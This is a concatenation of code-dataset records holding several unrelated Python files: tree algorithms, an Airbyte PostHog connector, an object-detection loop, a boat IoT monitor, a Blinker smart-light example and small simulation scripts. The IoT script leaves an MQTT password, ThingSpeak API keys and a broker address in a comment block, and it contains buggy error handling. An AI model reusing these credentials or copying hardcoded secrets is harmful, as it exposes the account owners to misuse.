lca_helper(root.right, node1, node2)\n        if right_result[0] == 2:\n            return right_result\n\n        num_target_nodes = (\n            left_result[0] + right_result[0] + (node1, node2).count(root)\n        )\n\n        return [num_target_nodes, root if num_target_nodes == 2 else None]\n\n    return lca_helper(root, node1, node2)[1]\n\n\ndef lca_using_hash_map(node1, node2):\n    \"\"\"Same as lca, but requires nodes to carry .parent pointers.\"\"\"\n    iter1, iter2 = node1, node2\n\n    seen_nodes = set()\n\n    while iter1 or iter2:\n        if iter1:\n            if iter1 in seen_nodes:\n                return iter1\n            seen_nodes.add(iter1)\n            iter1 = iter1.parent\n        if iter2:\n            if iter2 in seen_nodes:\n                return iter2\n            seen_nodes.add(iter2)\n            iter2 = iter2.parent\n    return None\n\n\ndef sum_root_to_leaf(root):\n    \"\"\"\n    i.e.
for :: 1\n 2 4\n\n 1 -> 2 = 12\n 1 -> 4 = 14\n = 26\n\n You basically go and multiply the previous one with 10,\n since we are in base 10.\n Likewise with base 2 for binary.\n \"\"\"\n\n def sum_numbers_helper(root, partial_sum):\n if not root:\n return 0\n\n partial_sum = partial_sum * 10 + root.data\n\n if not root.left and not root.right:\n return partial_sum\n\n return (sum_numbers_helper(root.left, partial_sum)\n + sum_numbers_helper(root.right, partial_sum))\n\n return sum_numbers_helper(root, 0)\n\n\ndef sum_root_to_leaf(tree):\n \"\"\"For binary values.\"\"\"\n\n def sum_root_to_leaf_helper(tree, partial_sum=0):\n if not tree:\n return 0\n\n partial_sum = partial_sum * 2 + tree.data\n if not tree.left and not tree.right:\n return partial_sum\n\n return (sum_root_to_leaf_helper(tree.left, partial_sum) +\n sum_root_to_leaf_helper(tree.right, partial_sum))\n\n return sum_root_to_leaf_helper(tree)\n","sub_path":"binary_trees.py","file_name":"binary_trees.py","file_ext":"py","file_size_in_byte":6044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"225738942","text":"#\n# Copyright (c) 2023 Airbyte, Inc., all rights reserved.\n#\n\nfrom dataclasses import dataclass\nfrom typing import Any, Iterable, Mapping, MutableMapping, Optional\n\nfrom airbyte_cdk.models import SyncMode\nfrom airbyte_cdk.sources.declarative.retrievers.simple_retriever import SimpleRetriever\nfrom airbyte_cdk.sources.declarative.stream_slicers import CartesianProductStreamSlicer\nfrom airbyte_cdk.sources.declarative.types import Record, StreamSlice\n\n\n@dataclass\nclass EventsSimpleRetriever(SimpleRetriever):\n def request_params(\n self,\n stream_state: StreamSlice,\n stream_slice: Optional[StreamSlice] = None,\n next_page_token: Optional[Mapping[str, Any]] = None,\n ) -> MutableMapping[str, Any]:\n \"\"\"Events API return records in descendent order (newest first).\n Default page limit is 100 items.\n\n Even though API mentions such pagination params as 'limit' and 'offset', they are actually ignored.\n Instead, response contains 'next' url with datetime range for next OLDER records, like:\n\n response:\n {\n \"next\": \"https://app.posthog.com/api/projects/2331/events?after=2021-01-01T00%3A00%3A00.000000Z&before=2021-05-29T16%3A44%3A43.175000%2B00%3A00\",\n \"results\": [\n {id ...},\n {id ...},\n ]\n }\n\n So if next_page_token is set (contains 'after'/'before' params),\n then stream_slice params ('after'/'before') should be ignored.\n \"\"\"\n\n if next_page_token:\n stream_slice = {}\n\n return self._get_request_options(\n stream_slice,\n next_page_token,\n self.requester.get_request_params,\n self.paginator.get_request_params,\n self.stream_slicer.get_request_params,\n )\n\n\n@dataclass\nclass EventsCartesianProductStreamSlicer(CartesianProductStreamSlicer):\n \"\"\"Connector requires support of nested state - each project should have own timestamp value, like:\n {\n \"project_id1\": {\n \"timestamp\": \"2021-02-01T10:21:35.003000Z\"\n },\n \"project_idX\": {\n \"timestamp\": \"2022-11-17:00:00.000000Z\"\n }\n }\n we also have to support old-style (before 0.1.8) states, like:\n {\n \"timestamp\": \"2021-17-01T10:21:35.003000Z\"\n }\n\n Slicer also produces separate datetime slices for each project\n \"\"\"\n\n def __post_init__(self, parameters: Mapping[str, Any]):\n self._cursor = {}\n self._parameters = parameters\n\n def get_stream_state(self) -> Mapping[str, Any]:\n return self._cursor or {}\n\n def update_cursor(self, stream_slice: StreamSlice, 
last_record: Optional[Record] = None):\n\n if not last_record:\n # this is actually initial stream state from CLI\n self._cursor = stream_slice\n return\n\n project_id = str(stream_slice.get(\"project_id\", \"\"))\n if project_id:\n current_cursor_value = self._cursor.get(project_id, {}).get(\"timestamp\", \"\")\n new_cursor_value = last_record.get(\"timestamp\", \"\")\n\n self._cursor[project_id] = {\"timestamp\": max(current_cursor_value, new_cursor_value)}\n\n def stream_slices(self, sync_mode: SyncMode, stream_state: Mapping[str, Any]) -> Iterable[Mapping[str, Any]]:\n \"\"\"Since each project has its own state, then we need to have a separate\n datetime slices for each project\n \"\"\"\n\n slices = []\n\n project_slicer, datetime_slicer = self.stream_slicers\n\n # support of old style state: it contains only a single 'timestamp' field\n old_style_state = stream_state if \"timestamp\" in stream_state else {}\n\n for project_slice in project_slicer.stream_slices(sync_mode, stream_state):\n project_id = str(project_slice.get(\"project_id\", \"\"))\n\n # use old_style_state if state does not contain states for each project\n project_state = stream_state.get(project_id, {}) or old_style_state\n\n # Each project should have own datetime slices depends on its state\n project_datetime_slices = datetime_slicer.stream_slices(sync_mode, project_state)\n\n # fix date ranges: start_time of next slice must be equal to end_time of previous slice\n if project_datetime_slices and project_state:\n project_datetime_slices[0][\"start_time\"] = project_state[\"timestamp\"]\n for i, datetime_slice in enumerate(project_datetime_slices[1:], start=1):\n datetime_slice[\"start_time\"] = project_datetime_slices[i - 1][\"end_time\"]\n\n # Add project id to each slice\n for datetime_slice in project_datetime_slices:\n datetime_slice[\"project_id\"] = project_id\n\n slices.extend(project_datetime_slices)\n\n return slices\n","sub_path":"dts/airbyte/airbyte-integrations/connectors/source-posthog/source_posthog/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"50073906","text":"import tensorflow as tf\r\nimport numpy as np\r\nfrom PIL import Image\r\n\r\nimport cv2\r\n\r\ncap = cv2.VideoCapture(\"video\\\\aoe_iii_snow_hills.mp4\")\r\n\r\nfrom object_detection.utils import ops as utils_ops\r\nfrom utils import label_map_util\r\nfrom utils import visualization_utils as vis_util\r\n\r\nPATH_TO_FROZEN_GRAPH = \"inference_graph\\\\frozen_inference_graph.pb\"\r\nPATH_TO_LABELS = \"data/aoeiii_label_map.pbtxt\"\r\n\r\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\r\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=2, use_display_name=True)\r\ncategory_index = label_map_util.create_category_index(categories)\r\n\r\nimage_path = \"data\\\\bbox_train_hills_jpeg\\\\172.jpeg\"\r\nfeed_image = Image.open(image_path)\r\n\r\n# Memory management code\r\n\r\nconfig = tf.ConfigProto()\r\nconfig.gpu_options.allow_growth = True\r\ntf.reset_default_graph()\r\nsess = tf.Session(config=config)\r\n\r\n\r\n_INPUT_NAME = 'image_tensor'\r\n_OUTPUT_NAME = 'detection_boxes'\r\n\r\ndet_graph = sess.graph\r\nod_graph_def = tf.GraphDef()\r\n\r\n# read frozen graph\r\nwith tf.gfile.GFile(PATH_TO_FROZEN_GRAPH, 'rb') as fid:\r\n serialized_graph = fid.read()\r\n od_graph_def.ParseFromString(serialized_graph)\r\n tf.import_graph_def(od_graph_def, 
name='')\r\n\r\nall_nodes = [n.name for n in tf.get_default_graph().as_graph_def().node]\r\nprint(all_nodes)\r\n\r\nwhile True:\r\n ret, image_np = cap.read()\r\n _input = det_graph.get_tensor_by_name(_INPUT_NAME + \":0\")\r\n\r\n boxes = det_graph.get_tensor_by_name(_OUTPUT_NAME + \":0\")\r\n scores = det_graph.get_tensor_by_name('detection_scores:0')\r\n classes = det_graph.get_tensor_by_name('detection_classes:0')\r\n num_detections = det_graph.get_tensor_by_name('num_detections:0')\r\n\r\n image_np_expanded = np.expand_dims(image_np, axis=0)\r\n\r\n (boxes, scores, classes, num_detections) = sess.run([boxes, scores, classes, num_detections],feed_dict={_input: image_np_expanded})\r\n\r\n # print(boxes)\r\n # print(scores)\r\n # print(classes)\r\n print(num_detections)\r\n\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n feed_image,\r\n np.squeeze(boxes),\r\n np.squeeze(classes).astype(np.int32),\r\n np.squeeze(scores),\r\n category_index,\r\n use_normalized_coordinates=True,\r\n line_thickness=8)\r\n\r\n cv2.imshow('AOE III', image_np)\r\n if cv2.waitKey(25) & 0xFF == ord('q'):\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n break\r\n","sub_path":"run_on_image.py","file_name":"run_on_image.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"49231671","text":"#!/usr/bin/python3\n\n\"\"\"\nMQTT topics must start with: EricssonONE/esignum/\nExample: \"EricssonONE/edallam/MQTT_Display/text\"\n\"\"\"\nfrom urllib2 import urlopen\n#from urllib.request import urlopen\nimport serial\nimport sys\nfrom time import sleep\nimport json \nimport datetime\n# For MQTT\nimport paho.mqtt.client as mqtt\nimport paho.mqtt.publish as publish\nfrom personal import *\n\n\n#the callback function\ndef on_connect(client, userdata, flags, rc):\n print(\"PUBLISH: Connected With Result Code {}\".format(rc))\n client.publish(topic = \"edallam/mmsi/boat/status\", payload=\"Online\", qos=0, retain=True) # TODO change to a publish that is with \"auth\"\n\ndef on_disconnect(client, userdata, rc):\n client.publish(topic = \"edallam/MQTT_Display/text\", payload = \"This is a test Message\")\n print(\"PUBLISH: Disconnected From Broker\")\n client.publish(topic = \"edallam/mmsi/boat/status\", payload=\"Offline - Disconnected\", qos=0, retain=True) # TODO change to a publish that is with \"auth\"\n\"\"\"\nMoved to personal.py\nbroker_address = \"iot.eclipse.org\"\nbroker_address = \"129.192.70.56\"\nMQTT_auth = {'username':\"edallam\", 'password':\"danielhackathon2019\"}\nbroker_portno = 1883\n# GET https://api.thingspeak.com/update?api_key=KEBDZO2LBQBJVV1Q&field1=0\nThingSpeak_Write_API_key = 'KEBDZO2LBQBJVV1Q'\nThingSpeak_Read_API_key ='5AYRZYT2BB16CBBW'\nThingSpeak_BaseURL = 'https://api.thingspeak.com/update?'\n\"\"\"\n\"\"\"\nconfig = getConfig()\nclient = mqtt.Client()\n#Assigning the object attribute to the Callback Function\nclient.will_set(\"EricssonONE/egarage/IoT_Can/status\", payload=\"Offline - Will\", qos=0, retain=True)\nclient.username_pw_set(username = \"edallam\", password = \"danielhackathon2019\")\nclient.on_connect = on_connect\nclient.on_disconnect = on_disconnect\nclient.connect(broker_address, broker_portno)\narduino1 = serial.Serial('/dev/ttyACM0',9600,timeout=100)\nprint(\"Listening to: \" + arduino1.name)\n#arduino2 = serial.Serial('/dev/ttyOP_arduino',9600,timeout=10)\n#print(\"Listening to: \" + arduino2.name)\n# URL where we will send the data, Don't change it\nbaseURL = 
ThingSpeak_BaseURL + 'api_key=%s' % ThingSpeak_Write_API_key\n\"\"\"\n# States and Global variables\n# BATTERY1\nbattery1_lastReportedValue = 0.0\n# BATTERY2\nbattery2_lastReportedValue = 0.0\n# SOLAR\nsolar_lastReportedValue = 0.0\n# DOOR\ndoor_lastReportedValue = 0\n# WATER\nwater_lastReportedValue = 0\n\n# ThingSpeak\nThingSpeak_reportingCounter = 1\nThingSpeak_unreportedChange = True\nfield1_str = ''\nfield2_str = ''\nfield3_str = ''\nfield4_str = ''\nfield5_str = ''\nfield6_str = ''\nfield7_str = ''\nfield8_str = ''\n\nclass serialList:\n def __init__(self):\n self.arduinoList = []\n\ndef startit():\n global ThingSpeak_reportingCounter\n\n global door_lastReportedValue\n\n client = mqtt.Client()\n\n config = getConfig()\n\n arduino1 = serial.Serial('/dev/ttyACM0',9600,timeout=100)\n #arduino2 = serial.Serial('/dev/ttyACM1',9600,timeout=100)\n #arduino3 = serial.Serial('/dev/ttyACM2',9600,timeout=100)\n #arduinoMain = [arduino1, arduino2, arduino3]\n\n #Assigning the object attribute to the Callback Function\n client.will_set(\"edallam/mmsi/boat/status\", payload=\"Offline - Will\", qos=0, retain=True)\n client.username_pw_set(username = config.MQTT_auth['username'], password = config.MQTT_auth['username'])\n client.on_connect = on_connect\n \n\n client.on_disconnect = on_disconnect\n\n client.connect(config.broker_address, config.broker_portno)\n\n\n\n while True:\n #try:\n #for x in arduino1:\n line = arduino1.readline().decode().replace('\\r\\n','')\n print(line)\n if startwith(line, 'edallam/BATTERY1'):\n data = decode_battery1(line)\n varning_battery1(data)\n publish_battery1(data)\n #signalk_battery1(data)\n if startwith(line, 'edallam/BATTERY2'):\n data = decode_battery1(line)\n varning_battery1(data)\n publish_battery1(data)\n if startwith(line, 'SOLAR'):\n data = decode_solar(line)\n publish_solar(data)\n if \"ejacsve/Temp[0]\" in line:\n data = decode_input(line)\n publish_display(\"Temperature\", data)\n if \"egebant/Distance\" in line:\n data = decode_input(line)\n topic = \"MQTT_TrashBin/Status\"\n if data >= 95 and data <= 110:\n publishMqttGeneric(topic, 'Bin is EMPTY')\n elif data >= 75 and data <= 80:\n publishMqttGeneric(topic, 'Bin is HALF FULL')\n elif data >= 20 and data <= 60:\n publishMqttGeneric(topic, 'Bin is FULL!, Collect Trash')\n else:\n publishMqttGeneric(topic, 'Sensor Placed Wrongly!')\n #publish_display(\"Distance\", data)\n if \"erohsat/lock\" in line:\n data = decode_input(line)\n topic = \"MQTT_WashRoomLock/Status\"\n if data == 1:\n publishMqttGeneric(topic, 'Occupied')\n else:\n publishMqttGeneric(topic, 'Free')\n #publish_display(\"Lock\", data)\n if startwith(line, 'edallam/DOOR'):\n data = decode_door(line)\n publish_door(data)\n \n else:\n print('No data received')\n send2ThingSpeak() \n #sleep(1)\n ThingSpeak_reportingCounter += 1\n \"\"\"\n except:\n print('Something went wrong. 
Retrying!')\n try:\n arduino1 = serial.Serial('/dev/ttyOP_devboard',9600,timeout=10)\n print(\"Listening to: \" + arduino1.name)\n except:\n print('Could not find arduino!')\n sleep(10)\n \"\"\"\n\n##################################################################\n\ndef publishMqttGeneric(topic, payload):\n config = getConfig()\n egarageTopic = \"EricssonONE/egarage/{}\".format(topic)\n\n publish.single(\\\n topic = egarageTopic, \\\n payload = payload, \\\n hostname = config.broker_address, \\\n client_id =\"\", \\\n keepalive = 60, \\\n will = None, \\\n auth = config.MQTT_auth, \\\n tls = None, \\\n protocol = mqtt.MQTTv311, \\\n transport = \"tcp\")\n\n print(\"Publish topic: {} payload: {}\".format(egarageTopic,payload)) \n\n##################################################################\n# Functions below\n##################################################################\n\n\ndef publish_display(name, data):\n diff = 0.1\n global ThingSpeak_unreportedChange\n global solar_lastReportedValue\n global field4_str\n print(\"data: {} lastValue: {}\".format(data, solar_lastReportedValue))\n if abs(data - solar_lastReportedValue) >= diff: \n ThingSpeak_unreportedChange = True\n #solar_lastReportedValue = data\n data = '%.2f' % data\n field4_str = '&field4=%s' % (data)\n #topic = \"Water\"\n topic = \"MQTT_Display/temperature\"\n publishMqttDisplay(topic, name + \": \" + data);\n\n\n \ndef publishMqttDisplay(topic, payload):\n config = getConfig()\n egarageTopic = \"EricssonONE/egarage/{}\".format(topic)\n\n publish.single(\\\n topic = egarageTopic, \\\n payload = payload, \\\n hostname = config.broker_address, \\\n client_id =\"\", \\\n keepalive = 60, \\\n will = None, \\\n auth = config.MQTT_auth, \\\n tls = None, \\\n protocol = mqtt.MQTTv311, \\\n transport = \"tcp\")\n\n print(\"Publish topic: {} payload: {}\".format(egarageTopic,payload))\n \n##################################################################\n# Main battery \ndef decode_battery1(line):\n #print(line)\n data = float(line[10:])\n if isinstance(data, float):\n return data\n else:\n return float(0.0) // Error\n\ndef varning_battery1(data):\n if isinstance(data, float):\n return data\n else:\n return float(0.0) // Error\n \ndef publish_battery1(data):\n diff = 0.1\n global ThingSpeak_unreportedChange\n global battery1_lastReportedValue\n global field1_str\n if abs(data-battery1_lastReportedValue) >= diff: \n ThingSpeak_unreportedChange = True\n battery1_lastReportedValue = data\n data = '%.2f' % data\n field1_str = '&field1=%s' % (data)\n\n\ndef signalk_battery1(data):\n diff = 0.1\n src_str = \"115\"\n pgn_str= \"128267\"\n path_str = \"electrical.batteries.0.voltage\"\n\n now = str(datetime.datetime.now())\n\n delta_message = json.loads(' { \"updates\":[ \\\n { \\\n \"source\": { \\\n \"device\": \"/dev/arduino\", \\\n \"src\": \"'+ src_str +'\", \"pgn\": \"'+ pgn_str +'\"}, \\\n \"timestamp\" : \"'+ str(now[:10] +'-'+ now[11:]) +'\", \\\n \"values\": [ \\\n { \\\n \"path\" : \"'+ path_str +' \", \"value\" : '+ str(data) +' \\\n } ] \\\n } \\\n ] }')\n print(delta_message)\n \n \n##################################################################\n# Solar panel\ndef decode_solar(line):\n data = float(line[7:])\n if isinstance(data, float):\n return data\n else:\n return float(0.0) // Error\n\ndef publish_solar(data):\n diff = 0.1\n global ThingSpeak_unreportedChange\n global solar_lastReportedValue\n global field4_str\n print(\"data: {} lastValue: {}\".format(data, solar_lastReportedValue))\n if abs(data - 
solar_lastReportedValue) >= diff: \n ThingSpeak_unreportedChange = True\n solar_lastReportedValue = data\n data = '%.2f' % data\n field4_str = '&field4=%s' % (data)\n topic = \"Water\"\n topic = \"MQTT_Display/text\"\n publishMqttDisplay(topic, \"Solar\" + data);\n\n\n\n\n##################################################################\n# Water \ndef decode_water(line):\n data = int(line[18:])\n if isinstance(data, int):\n return data\n else:\n return 2 // Error\n\ndef decode_input(line):\n name, data = line.split(\": \")\n data = float(data)\n if isinstance(data, float):\n return data\n else:\n return 2 // Error\n\n\ndef publish_water(data):\n diff = 0.1\n global ThingSpeak_unreportedChange\n global water_lastReportedValue\n global field5_str\n if abs(data-water_lastReportedValue) >= diff: \n ThingSpeak_unreportedChange = True\n water_lastReportedValue = data\n data = '%.2f' % data\n field5_str = '&field5=%s' % (data)\n\n##################################################################\n# Door\ndef decode_door(line):\n data = int(line[6:])\n if isinstance(data, int):\n return data\n else:\n return 2 // Error\n\ndef publish_door(data):\n diff = 0.1\n global ThingSpeak_unreportedChange\n global door_lastReportedValue\n global field6_str\n if abs(data-door_lastReportedValue) >= diff: \n ThingSpeak_unreportedChange = True\n door_lastReportedValue = data\n data = '%.2f' % data\n field6_str = '&field6=%s' % (data)\n publishMqttDisplay(\"The Door on your boat just opened!\")\n \n\n##################################################################\n# Other functions\n##################################################################\n\ndef startwith(line,tag):\n if tag in line[0:9]:\n return True\n else:\n return False\n\ndef send2ThingSpeak():\n global ThingSpeak_reportingCounter\n global ThingSpeak_unreportedChange\n global field1_str\n global field2_str\n global field3_str\n global field4_str\n global field5_str\n global field6_str\n global field7_str\n global field8_str\n global baseURL\n \"\"\"\n field1_str = ''\n field2_str = ''\n field3_str = ''\n field4_str = ''\n field5_str = ''\n field6_str = ''\n field7_str = ''\n field8_str = ''\n \"\"\"\n \n # Somethings has to be sent and we did not just send\n # or it was long since we sent something\n if (( ThingSpeak_unreportedChange and ThingSpeak_reportingCounter >= 100) or \\\n ( ThingSpeak_reportingCounter >= 1*36)):\n # Sending the data to thingspeak\n field_str = field1_str + field2_str + \\\n field3_str + field4_str + \\\n field5_str + field6_str + \\\n field7_str + field8_str\n\n config = getConfig()\n\n # URL where we will send the data, Don't change it\n baseURL = config.ThingSpeak_BaseURL + 'api_key=%s' % config.ThingSpeak_Write_API_key\n\n print(baseURL + field_str )\n conn = urlopen(baseURL + field_str ) # change from str1 to str to publish all\n print('ThingSpeak publish entry: ' + str(conn.read().decode()))\n # Closing the connection\n conn.close()\n ThingSpeak_unreportedChange = False\n ThingSpeak_reportingCounter = 0\n \n##################################################################\nif __name__ == \"__main__\":\n startit()\n","sub_path":"IoT_CAN/RaspberryPi/IoT_Can_v1.1.4.py","file_name":"IoT_Can_v1.1.4.py","file_ext":"py","file_size_in_byte":13015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"280351635","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom Blinker.Blinker import Blinker, BlinkerButton, BlinkerNumber, BlinkerMiot\nfrom Blinker.BlinkerConfig 
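The send2ThingSpeak logic above posts only when a change is pending or a heartbeat counter expires. A minimal standalone sketch of that report-on-change-or-heartbeat pattern (the ChangeReporter class and its defaults are illustrative assumptions, not from the original script):

class ChangeReporter:
    def __init__(self, threshold=0.1, heartbeat=36):
        self.threshold = threshold  # minimum change worth reporting
        self.heartbeat = heartbeat  # force a report every N polls regardless
        self.last_value = None
        self.counter = 0

    def poll(self, value):
        """Return True when `value` should be pushed upstream."""
        self.counter += 1
        changed = (self.last_value is None
                   or abs(value - self.last_value) >= self.threshold)
        if changed or self.counter >= self.heartbeat:
            self.last_value = value
            self.counter = 0
            return True
        return False

reporter = ChangeReporter()
for reading in (12.00, 12.01, 12.50, 12.51):
    if reporter.poll(reading):
        print('would publish', reading)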
import *\nfrom Blinker.BlinkerDebug import *\n\nauth = 'Your Device Secret Key'\n\nBLINKER_DEBUG.debugAll()\n\nBlinker.mode('BLINKER_WIFI')\nBlinker.miType('BLINKER_MIOT_LIGHT') # BLINKER_MIOT_LIGHT 灯, BLINKER_MIOT_OUTLET 插座, BLINKER_MIOT_MULTI_OUTLET 多口插座, BLINKER_MIOT_SENSOR 传感器\nBlinker.begin(auth)\n\nbutton1 = BlinkerButton('btn-abc')\nnumber1 = BlinkerNumber('num-abc')\n\ncounter = 0\nwsState = 'on'\nwsMode = BLINKER_CMD_COMMON\n\ndef miotPowerState(state):\n ''' '''\n\n BLINKER_LOG('need set power state: ', state)\n\n wsState = state and 'on' or 'off'\n BlinkerMiot.powerState(wsState)\n BlinkerMiot.print()\n\ndef miotColor(color):\n ''' '''\n\n BLINKER_LOG('need set color: ', color)\n\n # if color == 'Red':\n # # your codes\n # elif color == 'Yellow':\n # # your codes\n # elif color == 'Blue':\n # # your codes\n # elif color == 'Green':\n # # your codes\n # elif color == 'White':\n # # your codes\n # elif color == 'Black':\n # # your codes\n # elif color == 'Cyan':\n # # your codes\n # elif color == 'Purple':\n # # your codes\n # elif color == 'Orange':\n # # your codes\n\n BlinkerMiot.color(color)\n BlinkerMiot.print()\n\ndef miotMode(mode):\n ''' '''\n\n BLINKER_LOG('need set mode: ', mode)\n\n # if mode == BLINKER_CMD_MIOT_READING:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_MOVIE:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_SLEEP:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_HOLIDAY:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_MUSIC:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_COMMON:\n # # Your mode function\n\n BlinkerMiot.mode(mode)\n BlinkerMiot.print()\n\ndef miotcMode(cmode):\n ''' '''\n\n BLINKER_LOG('need cancel mode: ', cmode)\n\n # if mode == BLINKER_CMD_MIOT_READING:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_MOVIE:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_SLEEP:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_HOLIDAY:\n # # Your mode function\n # elif mode == BLINKER_CMD_Miot_MUSIC:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_COMMON:\n # # Your mode function\n\n BlinkerMiot.mode(cMode)\n BlinkerMiot.print()\n\ndef miotBright(bright):\n ''' '''\n\n BLINKER_LOG('need set brightness: ', bright)\n\n BlinkerMiot.brightness(bright)\n BlinkerMiot.print()\n\n\ndef miotColorTemp(colorTemp):\n ''' '''\n\n BLINKER_LOG('need set colorTemperature: ', colorTemp)\n\n BlinkerMiot.colorTemp(colorTemp)\n BlinkerMiot.print()\n\n# 0xFF0000: # 'red'\n# 0xFFFF00: # 'yellow'\n# 0x0000FF: # 'blue'\n# 0x00FF00: # 'green'\n# 0xFFFFFF: # 'white'\n# 0x000000: # 'black'\n# 0x00FFFF: # 'cyan'\n# 0x800080: # 'purple'\n# 0xFFA500: # 'orange'\ncolorMap = {'red':0xFF0000, 'green':0x00FF00, 'blue':0x0000FF}\n\ndef _getCurColor():\n current_color = 'red'\n return colorMap.get(current_color)\n\ndef miotQuery(queryCode):\n ''' '''\n\n BLINKER_LOG('Miot Query codes: ', queryCode)\n\n if queryCode == BLINKER_CMD_QUERY_ALL_NUMBER :\n BLINKER_LOG('Miot Query All')\n BlinkerMiot.powerState(wsState)\n BlinkerMiot.color(_getCurColor())\n BlinkerMiot.mode(wsMode)\n BlinkerMiot.colorTemp(50)\n BlinkerMiot.brightness(100)\n BlinkerMiot.print()\n elif queryCode == BLINKER_CMD_QUERY_POWERSTATE_NUMBER :\n BLINKER_LOG('Miot Query Power State')\n BlinkerMiot.powerState(wsState)\n BlinkerMiot.print()\n elif queryCode == BLINKER_CMD_QUERY_COLOR_NUMBER :\n BLINKER_LOG('Miot Query Color')\n BlinkerMiot.color('red')\n BlinkerMiot.print()\n elif queryCode == BLINKER_CMD_QUERY_MODE_NUMBER :\n 
BLINKER_LOG('Miot Query Mode')\n BlinkerMiot.mode(wsMode)\n BlinkerMiot.print()\n elif queryCode == BLINKER_CMD_QUERY_COLORTEMP_NUMBER :\n BLINKER_LOG('Miot Query ColorTemperature')\n BlinkerMiot.colorTemp(50)\n BlinkerMiot.print()\n elif queryCode == BLINKER_CMD_QUERY_BRIGHTNESS_NUMBER :\n BLINKER_LOG('Miot Query Brightness')\n BlinkerMiot.brightness(100)\n BlinkerMiot.print()\n else :\n BlinkerMiot.powerState(wsState)\n BlinkerMiot.color('red')\n BlinkerMiot.mode(wsMode)\n BlinkerMiot.colorTemp(50)\n BlinkerMiot.brightness(100)\n BlinkerMiot.print()\n\ndef button1_callback(state):\n ''' '''\n\n BLINKER_LOG('get button state: ', state)\n\n button1.icon('icon_1')\n button1.color('#FFFFFF')\n button1.text('Your button name or describe')\n button1.print(state)\n\ndef data_callback(data):\n global counter\n \n BLINKER_LOG('Blinker readString: ', data)\n counter += 1\n number1.print(counter)\n\nbutton1.attach(button1_callback)\nBlinker.attachData(data_callback)\n\nBlinkerMiot.attachPowerState(miotPowerState)\nBlinkerMiot.attachColor(miotColor)\nBlinkerMiot.attachMode(miotMode)\nBlinkerMiot.attachCancelMode(miotcMode)\nBlinkerMiot.attachBrightness(miotBright)\nBlinkerMiot.attachColorTemperature(miotColorTemp)\nBlinkerMiot.attachQuery(miotQuery)\n\nif __name__ == '__main__':\n\n while True:\n Blinker.run()\n","sub_path":"example/Blinker_Miot/Miot_LIGHT/Miot_LIGHT.py","file_name":"Miot_LIGHT.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333232739","text":"import openpyxl\n# import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\npath = './聚类结果.xlsx'\nwb = openpyxl.load_workbook(path)\nsh = wb['Sheet2']\ndata_dhl = []\n\n最大供货量 = []\n订单次数 = []\n完成率 = []\n平均供货量 = []\n\nfor row in list(sh.rows)[1:376]:\n 最大供货量.append(row[3].value)\n 订单次数.append(row[4].value)\n 完成率.append(row[5].value)\n 平均供货量.append(row[6].value)\n\n# print(最大供货量)\n\nB_最大供货量 = []\nB_订单次数 = []\nB_完成率 = []\nB_平均供货量 = []\n\nfor i in range(0, 374):\n tp1, tp2, tp3, tp4 = [], [], [], []\n # print(i, len(tp1))\n for j in range(0, 374):\n # print('i = ', i, ' j = ', j)\n tp1.append(最大供货量[i] / 最大供货量[j])\n tp2.append(订单次数[i] / 订单次数[j])\n tp3.append(完成率[i] / 完成率[j])\n tp4.append(平均供货量[i] / 平均供货量[j])\n pass\n # print('tp1 len = ', len(tp1))\n B_最大供货量.append(tp1)\n B_订单次数.append(tp2)\n B_完成率.append(tp3)\n B_平均供货量.append(tp4)\n","sub_path":"层次分析法/生成B矩阵.py","file_name":"生成B矩阵.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"392940155","text":"import pymunk\nfrom pymunk.vec2d import Vec2d\n\nimport random\nimport time\n\nfrom shapes.blob import Blob\n\n\nclass ATP(Blob):\n def __init__(self, parent_cell, init_position=Vec2d(0.0, 0.0)):\n super().__init__(\n init_position=init_position,\n init_mass=1,\n init_moment=100,\n init_radius=1,\n move_force=0.1,\n growth_factor=1,\n )\n self.parent_cell = parent_cell\n\n def time_step(self):\n self.move()\n if random.random() < 0.1:\n self.change_dir_ask()\n","sub_path":"cell/cell_component/atp.py","file_name":"atp.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"576889968","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport eventlet\nfrom sys import float_info\nfrom argparse import ArgumentParser\n\nfrom flask import Flask, jsonify, render_template\nfrom flask_cors import CORS\nfrom 
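The pairwise-ratio matrices above (B[i][j] = x[i] / x[j], built with two nested loops) can be produced in one step with NumPy broadcasting. A small illustrative sketch; the sample values are made up:

import numpy as np

x = np.array([3.0, 6.0, 12.0])      # e.g. one criterion column
B = x[:, None] / x[None, :]         # outer division: B[i, j] = x[i] / x[j]
print(B)
# [[1.   0.5  0.25]
#  [2.   1.   0.5 ]
#  [4.   2.   1.  ]]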
